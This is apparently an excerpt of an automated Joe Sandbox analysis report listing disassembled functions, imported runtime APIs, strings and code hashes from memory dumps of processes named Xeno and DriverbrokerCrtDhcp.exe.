Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: cf4ad1e47728b8125e5964b361a826ce27b6b385610bb5944a91feb1556dffc9
Instruction ID: 0c7dcb4cb487f07aefbb19e648f463d3f1d811c4b798d2ae1edf84e0204a8002
Opcode Fuzzy Hash: cf4ad1e47728b8125e5964b361a826ce27b6b385610bb5944a91feb1556dffc9
Instruction Fuzzy Hash: C1316B26A08A46C1EE15AB16E4401B963A0FF94BD4F18453BDE4EC76A5FF7CF849C321

Function 00007FF68D5F34A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 190COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF68D5F3510

Part of subcall function 00007FF68D5F2970: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68D5F2316), ref: 00007FF68D5F2983

_CallSETranslator.LIBVCRUNTIME ref: 00007FF68D5F355B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F378E

Strings

MOC, xrefs: 00007FF68D5F3524
RCC, xrefs: 00007FF68D5F352C

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 6f2db744ac662fd3d70d451773660cb5a32c88955c90cc972c90a3d241b120de
Instruction ID: dd143fb8a561131277958ae51153ea15129682be35bb36520c3c09a0970c1958
Opcode Fuzzy Hash: 6f2db744ac662fd3d70d451773660cb5a32c88955c90cc972c90a3d241b120de
Instruction Fuzzy Hash: A9918F73A08781CAF710DB65E8402AD7BA0FB44788F14413AEE8D9BB55EF78D199CB11

Function 00007FF68D5EEF20 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5EEFDA

Strings

x64, xrefs: 00007FF68D5EEF83
You must install or update .NET to run this application., xrefs: 00007FF68D5EEF8D
%sApp: %sArchitecture: %sApp host version: %s.NET location: %sLearn more:https://aka.ms/dotnet/app-launch-failedDownload, xrefs: 00007FF68D5EEF94
8.0.8, xrefs: 00007FF68D5EEF68

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: %sApp: %sArchitecture: %sApp host version: %s.NET location: %sLearn more:https://aka.ms/dotnet/app-launch-failedDownload$8.0.8$You must install or update .NET to run this application.$x64
API String ID: 3668304517-1341214489
Opcode ID: a92fa66e97e0067d9ff6593ca37c29cb84103f00721856d305cb6c5e94c01af7
Instruction ID: 86385c4afb06451287386f9a675e5f2bdd2b1928bf36112a1978c514ee4c613d
Opcode Fuzzy Hash: a92fa66e97e0067d9ff6593ca37c29cb84103f00721856d305cb6c5e94c01af7
Instruction Fuzzy Hash: 7021C871A18A42C0EA00DB15F48016D6361FF457D4F50113BEEAC87699EF7CE54CC361

Function 00007FF68D5F044C Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF68D5F0469
std::locale::_Setgloballocale.LIBCPMT ref: 00007FF68D5F048C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E5DBC), ref: 00007FF68D5F04AD
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E5DBC), ref: 00007FF68D5F04CB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF68D5F0521

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_Setgloballocalefreemallocstd::locale::_
String ID:
API String ID: 2400387105-0
Opcode ID: 2a6e0c499abe03c911e9eab8a3518031c7cc19002d42f36788c5138a79854d2f
Instruction ID: 6b34e0cd98388c09dee49d366352ca5efe619ea12d4e20d37c2b6012c5c19def
Opcode Fuzzy Hash: 2a6e0c499abe03c911e9eab8a3518031c7cc19002d42f36788c5138a79854d2f
Instruction Fuzzy Hash: 79216D21A08A86C5EB14AB15D44477967A0FF44F84F5C403ADE0D8B765EF7CE889C311

Function 00007FF68D5E7B10 Relevance: 7.5, APIs: 5, Instructions: 32threadCOMMON

Download Yara Rule

APIs

SwitchToThread.KERNEL32 ref: 00007FF68D5E7B3F
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7B5A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7B75
fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7B7E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF68D5E7B89

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: __acrt_iob_funcfflush$SwitchThread
String ID:
API String ID: 2569594562-0
Opcode ID: 632681c2061b277c5d70717be25f9f4338a33d6bc708ea27c4336cf21d4a4ca7
Instruction ID: 8686471205c42f804b43d533a7070c0441d145bd9d3bacb1e5133d648c594c83
Opcode Fuzzy Hash: 632681c2061b277c5d70717be25f9f4338a33d6bc708ea27c4336cf21d4a4ca7
Instruction Fuzzy Hash: 6C01E824E48A07C6F7159B65A85433922A5FF59B84F00013EDD5DCA290FEBCE88CCB62

Function 00007FF68D5F3A20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF68D5F3A4A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF68D5F3CE9), ref: 00007FF68D5F3CAE

Strings

csm, xrefs: 00007FF68D5F3A6F
csm, xrefs: 00007FF68D5F3BDE

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: __except_validate_context_recordabort
String ID: csm$csm
API String ID: 746414643-3733052814
Opcode ID: e3a4a0259cb965a332d785ee685cc1b9c4e377a60525cbc42dc7a521f5a24e84
Instruction ID: 3eb54a74f25428e91942c50f671eed19d01e019a84ac876ded48756cbe3224a6
Opcode Fuzzy Hash: e3a4a0259cb965a332d785ee685cc1b9c4e377a60525cbc42dc7a521f5a24e84
Instruction Fuzzy Hash: CC81A072508681C6FB608F25944436D7BA1FF44B84F04813AEE8C8BB89EE7CD599C752

Function 00007FF68D5F2704 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF68D5F272F
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF68D5F27C6
RtlUnwindEx.KERNEL32 ref: 00007FF68D5F2820

Strings

csm, xrefs: 00007FF68D5F27AD

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: f2318c7a055a6079a0dbd8a9a1657cfcd3cd3fbf5b3a6c1e41c49ccf07b950e3
Instruction ID: 514414c1d0510fb3232f045d6a480030fcb18a5f779930e72c36ee12eee37f2a
Opcode Fuzzy Hash: f2318c7a055a6079a0dbd8a9a1657cfcd3cd3fbf5b3a6c1e41c49ccf07b950e3
Instruction Fuzzy Hash: AC519F72B19602CAEB148B15E444A7C3791FF44B98F10853ADE4ACB788EFBCE849C711

Function 00007FF68D5F3ED0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68D5F2970: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF68D5F2316), ref: 00007FF68D5F2983

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF68D5F3F7A
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FF68D5F3FA3

Strings

csm, xrefs: 00007FF68D5F40A3

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_recordabort
String ID: csm
API String ID: 2466640111-1018135373
Opcode ID: ccf39f6b81b850e387033f07419b21d592ac85287455093a17eea57b1d99f89b
Instruction ID: 19da07e422f3d78c9fb114a4ab423aa0aecdedb2e2f6dbf5817dd687e6fa36fb
Opcode Fuzzy Hash: ccf39f6b81b850e387033f07419b21d592ac85287455093a17eea57b1d99f89b
Instruction Fuzzy Hash: 70518D76618745C6E620AB15E54026E77B4FB88B90F00053AEF8C8BB55EF78E4A4CB12

Function 00007FF68D5E2820 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF68D5E28B7
wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF68D5E2950
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E29DE

Strings

), xrefs: 00007FF68D5E28D2

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: wcsncmp$_invalid_parameter_noinfo_noreturn
String ID: )
API String ID: 1270597861-2427484129
Opcode ID: 30cab0a8b37a9af946f2d0825c3a12b9f72c8937212c1dc331fe0a8d7b57daae
Instruction ID: 6f9c304c4f9eb96b5df9d94d423c0949cb5cd3b20dd711b3c221ddb2ff54ad92
Opcode Fuzzy Hash: 30cab0a8b37a9af946f2d0825c3a12b9f72c8937212c1dc331fe0a8d7b57daae
Instruction Fuzzy Hash: D8519521908A85C0F6259B28E4063FD63A0FF99794F045236DE9C96269FF7DE1CACB11

Function 00007FF68D5E8710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E8739
wcstoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF68D5E8760

Strings

invalid stoul argument, xrefs: 00007FF68D5E87A0
stoul argument out of range, xrefs: 00007FF68D5E8793

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _errnowcstoul
String ID: invalid stoul argument$stoul argument out of range
API String ID: 4037081904-1365241121
Opcode ID: 235824eda5d1bbbe9c5d1741840db80cccd0729cccf95e470c3edaf06b06b458
Instruction ID: e6573b5374e9cbb035bf54957fe8f22aeebe0ee217417dcf6d4d3cadc8fd0c42
Opcode Fuzzy Hash: 235824eda5d1bbbe9c5d1741840db80cccd0729cccf95e470c3edaf06b06b458
Instruction Fuzzy Hash: 29110A25908601C1DB54AB21E4803B823A0FF84760F480536DF2D8BBD5EF7CE489D712

Function 00007FF68D5F2468 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F24C8

Strings

csm, xrefs: 00007FF68D5F2488
RCC, xrefs: 00007FF68D5F2478
MOC, xrefs: 00007FF68D5F2480

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: terminate
String ID: MOC$RCC$csm
API String ID: 1821763600-2671469338
Opcode ID: 94ce648c22d0cacb220361a3c4b44e3732c2cb9c128cf18046935c39d1eb8ba8
Instruction ID: 61395428e896d665266a7445e34f0eb581347195ef90c2477c716691d12f6e53
Opcode Fuzzy Hash: 94ce648c22d0cacb220361a3c4b44e3732c2cb9c128cf18046935c39d1eb8ba8
Instruction Fuzzy Hash: 64F08C7A95824AC1E3249F10B24506C3364FF49744F18947ADF58CB292EFBCE894CA63

Function 00007FF68D5E1560 Relevance: 6.2, APIs: 4, Instructions: 221COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E1756
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E17FE

Part of subcall function 00007FF68D5F0D08: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF68D5E1BAF), ref: 00007FF68D5F0D22

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E1843
__std_exception_destroy.LIBVCRUNTIME ref: 00007FF68D5E186D

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_destroymalloc
String ID:
API String ID: 2647511316-0
Opcode ID: e695c79c2d050c280309a69725b70547ea0a5e47803c5606a331380bee7622c4
Instruction ID: f3d06a9bf62f65a323cfd3a21bea19e0fb3a0c81a6bbf872cffd06e773f16ec5
Opcode Fuzzy Hash: e695c79c2d050c280309a69725b70547ea0a5e47803c5606a331380bee7622c4
Instruction Fuzzy Hash: AC91C322F18B41C9FB109BA4D4403EC2371BF54798F54423ADE6D96B99EE78A099C351

Function 00007FF68D5F66B0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F6714
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F6784
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F67F4
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5F6864

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 3a528b978d54263c84e02068a586c8d6fe272a3c609bdb9429f03c962e735b4a
Instruction ID: fb0a0a59b67062dde89f5dc5b32cd964fdff32d2a23483c2aa011783ed2c498c
Opcode Fuzzy Hash: 3a528b978d54263c84e02068a586c8d6fe272a3c609bdb9429f03c962e735b4a
Instruction Fuzzy Hash: BD416DA4E09687D0FA049B2DE88437D13A1FF48BC4F90543AD94D9A565FEBCA9CCD321

Function 00007FF68D5F1A2C Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF68D5F1A58
GetCurrentThreadId.KERNEL32 ref: 00007FF68D5F1A66
GetCurrentProcessId.KERNEL32 ref: 00007FF68D5F1A72
QueryPerformanceCounter.KERNEL32 ref: 00007FF68D5F1A82

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: e92f1acfccab1450a028a97d4294f87ee012edefc36bb0478250a4ff7575481d
Instruction ID: c20d641748d905fb15be5f7b7083b815b194bcdd4e79c41cc5ae75a4efff15a5
Opcode Fuzzy Hash: e92f1acfccab1450a028a97d4294f87ee012edefc36bb0478250a4ff7575481d
Instruction Fuzzy Hash: 79114F22B14F05CAEB008B60E8446A833A4FB18B58F440D35EE5D86754EF7CD19CC350

Function 00007FF68D5E6600 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68D5E674E
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68D5E675B

Strings

\\?\, xrefs: 00007FF68D5E6608

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: \\?\
API String ID: 73155330-4282027825
Opcode ID: 58e19ee06cd3888d1c8f0c359d90a8b184b87b30e04aba91814ed1d7f53a7290
Instruction ID: 54cadb46ee45068146508afe43fc207a81faa1ba06c5e23fb77bc207a733ff16
Opcode Fuzzy Hash: 58e19ee06cd3888d1c8f0c359d90a8b184b87b30e04aba91814ed1d7f53a7290
Instruction Fuzzy Hash: 4E31BF62605A45C5EE10AB15A404279A3A1BF04BF4F580B3ADEBD4BBD5FE7CE449C311

Function 00007FF68D5F25EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68D5F025E), ref: 00007FF68D5F263C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68D5F025E), ref: 00007FF68D5F267D

Strings

csm, xrefs: 00007FF68D5F266A

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: fac8c9d42dd350efc0dfb88de78fe394cb7a7c0c849b04581a4650b2b10cfa14
Instruction ID: 6e9615c54c042dc7e02b2e721702bd767c28212312dd67421106efb25acdb8d7
Opcode Fuzzy Hash: fac8c9d42dd350efc0dfb88de78fe394cb7a7c0c849b04581a4650b2b10cfa14
Instruction Fuzzy Hash: 96116D32608B4182EB618F15F80026977E0FF88B84F584239DE8C8B758EF7CC555CB10

Function 00007FF68D5F298C Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF68D5F2979,?,?,?,?,00007FF68D5F2316), ref: 00007FF68D5F29AB
SetLastError.KERNEL32(?,?,?,00007FF68D5F2979,?,?,?,?,00007FF68D5F2316), ref: 00007FF68D5F2A32

Memory Dump Source

Source File: 00000007.00000002.2347073653.00007FF68D5E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF68D5E0000, based on PE: true

Associated: 00000007.00000002.2347039565.00007FF68D5E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347131943.00007FF68D601000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000007.00000002.2347156727.00007FF68D603000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff68d5e0000_Xeno.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d7b08301a7bdf6a43736a8eaf15f43822576de2ab389cfee17f58cab7eb63aba
Instruction ID: 94858482ea6df302d4901dcb22cfca7503ec87007b06a4b302da61b6db9644c4
Opcode Fuzzy Hash: d7b08301a7bdf6a43736a8eaf15f43822576de2ab389cfee17f58cab7eb63aba
Instruction Fuzzy Hash: 1E119061E58306C1FA249721E8001392291BF48BE0F04463EED6EDB7D5FEBCB899C621

Analysis Process: DriverbrokerCrtDhcp.exePID: 1864, Parent PID: 2104COMMON

Executed Functions

Function 00007FFD34C66100 Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2733921962.00007FFD34C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd34c50000_DriverbrokerCrtDhcp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1ad14ca7143aa0c224bf6e42f29ba047b4dcaf7f1dc34fb6beabcf6cfa3c43e
Instruction ID: 1a9096686e476349747047eee6564321747ea3bacf6880728d125536a082542b
Opcode Fuzzy Hash: b1ad14ca7143aa0c224bf6e42f29ba047b4dcaf7f1dc34fb6beabcf6cfa3c43e
